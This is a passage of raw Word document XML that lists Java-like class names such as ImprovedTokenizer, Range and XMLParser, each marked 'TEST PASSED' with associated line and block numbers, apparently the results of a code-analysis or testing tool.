      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Blocks: [17] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AB974D" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CD82304" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ImprovedTokenizer: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC41336" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Lines: [82, 86, 88]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6550BA96" w14:textId="10DB9FA7" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Blocks: [82, 87, 88] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6512E85A" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2168B910" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Inflection: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499051A9" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Lines: [97]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409998BC" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Blocks: [98] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1690AC2C" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4729DAB7" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OutputFormat: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB88A4E" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Lines: [90]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619E946C" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Blocks: [88] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E8D5DD" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24617034" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ParameterParser: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491A4A77" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Lines: [72, 73, 74, 75]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E577AE" w14:textId="54887846" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Blocks: [67, 69, 69, 70] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2D0F7A" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57B776D0" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Range: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3455EBF2" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Lines: [45, 75, 85, 90, 92]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F496958" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Blocks: [41, 76, 89, 93, 94] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F63DBBB" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24F14EDB" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RationalNumber: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586AEAB1" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Lines: [57, 84, 85, 87]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BA7EEA" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Blocks: [51, 82, 83, 84] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311B0528" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74A1942A" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ResultSetColumnReader: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BDF7C8" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Lines: [7]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D79C7C" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Blocks: [6] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41500298" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35804987" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ResultSetHelper: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15917E63" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Lines: [30]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AA543D" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Blocks: [28] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351CD29A" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DC81DC9" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>StringParser: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712B7891" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Lines: [38]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E5A452" w14:textId="0E65ADEC" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Blocks: [39] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DD8B7F" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="763D5954" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SubjectParser: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A98F5AF" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Lines: [30]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49161251" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Blocks: [25] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429F4129" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7293AC11" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TimeStamp: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263CF0C7" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Lines: [97]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEDCBA7" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Blocks: [97] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C986D2" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="133E2BA9" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>VCardBean: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531D9F47" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Lines: [30, 31, 81]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32743911" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Blocks: [24, 25, 78] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E91F1D" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="355B6A49" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WeakHashtable: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0948B1" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Lines: [71, 78, 79]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72365D6E" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Blocks: [72, 78, 80] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1666AA50" w14:textId="77777777" w:rsidR="00BE23CF" w:rsidRPr="00715086" w:rsidRDefault="00BE23CF" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="395B70BA" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>XmlElement: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040067C4" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Lines: [74, 83, 85, 87, 88]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E998CAB" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Blocks: [66, 77, 80, 84, 86] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF66A9F" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B65488E" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>XMLParser: TEST PASSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679D2D8D" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Lines: [43]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E95C62" w14:textId="77777777" w:rsidR="009C5323" w:rsidRPr="00715086" w:rsidRDefault="009C5323" w:rsidP="009C5323">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715086">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Blocks: [38] </w:t>
      </w:r>
